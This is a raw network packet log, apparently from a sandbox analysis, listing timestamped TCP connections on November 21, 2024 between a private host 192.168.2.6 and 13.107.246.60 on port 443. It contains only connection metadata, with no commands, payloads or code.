                                                                                                                                                                        Nov 21, 2024 10:38:30.343018055 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.343061924 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.343087912 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.343105078 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.343115091 CET49983443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.343121052 CET4434998313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.347047091 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.347085953 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.347155094 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.347325087 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.347335100 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.378108978 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.381793976 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.381885052 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.381939888 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.381961107 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.381973982 CET49984443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.381979942 CET4434998413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.384865046 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.384902000 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.384985924 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.385147095 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.385165930 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.456168890 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.459510088 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.459579945 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.459585905 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.459635973 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.459702969 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.459712982 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.459734917 CET49985443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.459739923 CET4434998513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.462331057 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.462367058 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.462443113 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.462588072 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.462598085 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.636496067 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.637073040 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.637104988 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:30.637540102 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:30.637552023 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.080636978 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.083681107 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.083750963 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.083794117 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.083794117 CET49986443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.083815098 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.083826065 CET4434998613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.086833954 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.086879015 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.086988926 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.087130070 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.087138891 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.529195070 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.529844999 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.529865980 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.530316114 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.530319929 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.972760916 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.972801924 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.972852945 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.972872019 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.973102093 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.973107100 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.973134041 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.973262072 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.973304033 CET4434998713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.973350048 CET49987443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.976109982 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.976151943 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:31.976222038 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.976373911 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:31.976391077 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.098048925 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.100949049 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.100975990 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.101509094 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.101516962 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.142071009 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.144016981 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.144040108 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.144395113 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.144403934 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.205127001 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.205799103 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.205827951 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.206207991 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.206212997 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.535949945 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.539144039 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.539205074 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.539210081 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.539249897 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.539278984 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.539299965 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.539335012 CET49989443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.539340973 CET4434998913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.541760921 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.541794062 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.542243958 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.542361021 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.542370081 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.588912964 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.592093945 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.592138052 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.592153072 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.592187881 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.592257023 CET49988443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.592269897 CET4434998813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.597889900 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.597930908 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.598237991 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.598716974 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.598731995 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.640211105 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.643546104 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.643635988 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.643789053 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.643789053 CET49990443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.643805981 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.643826962 CET4434999013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.646397114 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.646431923 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.646501064 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.646635056 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.646642923 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.964198112 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.964986086 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.965065956 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:32.965326071 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:32.965343952 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.425108910 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.428181887 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.428271055 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.431751966 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.431782961 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.431813955 CET49991443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.431819916 CET4434999113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.435170889 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.435257912 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.435357094 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.435481071 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.435539961 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.824081898 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.825025082 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.825054884 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:33.825665951 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:33.825673103 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.276720047 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.279953957 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.280019045 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.280086040 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.280086040 CET49992443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.280102015 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.280112028 CET4434999213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.287755966 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.287807941 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.287872076 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.288053989 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.288069963 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.321037054 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.321476936 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.321489096 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.322000980 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.322005033 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.381858110 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.382303953 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.382333040 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.382771969 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.382776976 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.498400927 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.536974907 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.536995888 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.540725946 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.540730953 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.764523983 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.764559031 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.764610052 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.764673948 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.764697075 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.764977932 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.764977932 CET49993443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.764995098 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.765002966 CET4434999313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.768069983 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.768117905 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.768204927 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.768402100 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.768420935 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.825557947 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.828675032 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.828802109 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.828835011 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.828850985 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.828862906 CET49994443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.828867912 CET4434999413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.837616920 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.837651968 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.837738991 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.837938070 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.837949991 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.943748951 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.948605061 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.948659897 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.948719025 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.948719025 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.948838949 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.948858976 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.948862076 CET49995443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.948868036 CET4434999513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.952733040 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.952754974 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:34.952852964 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.953412056 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:34.953440905 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.151587963 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.152168036 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.152201891 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.152800083 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.152805090 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.587193966 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.590197086 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.590373039 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.590373039 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.590373039 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.592974901 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.593008041 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.593214989 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.593214989 CET50001443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.593242884 CET4435000113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:35.890607119 CET49996443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:35.890645981 CET4434999613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.083004951 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.083518982 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.083597898 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.083992958 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.084008932 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.528518915 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.531754017 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.531799078 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.531896114 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.531970024 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.531982899 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.532000065 CET49997443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.532006025 CET4434999713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.540981054 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.541007042 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.541085958 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.541522980 CET50002443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.541532993 CET4435000213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.546693087 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.549819946 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.549860001 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.550261021 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.550267935 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.564572096 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.565795898 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.565808058 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.566198111 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.566203117 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.751895905 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.752353907 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.752362967 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.752816916 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.752821922 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.989427090 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.992800951 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.992886066 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.992975950 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.992975950 CET49998443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:36.993022919 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.993051052 CET4434999813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.998225927 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.998399973 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:36.998477936 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.057560921 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.057605982 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.057631969 CET49999443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.057642937 CET4434999913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.062905073 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.062951088 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.063009024 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.064651012 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.064697981 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.064750910 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.064889908 CET50003443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.064915895 CET4435000313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.065082073 CET50004443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.065093994 CET4435000413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.194279909 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.197098970 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.197196960 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.197611094 CET50000443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:37.197623014 CET4435000013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:37.197658062 CET50000443192.168.2.613.107.246.60
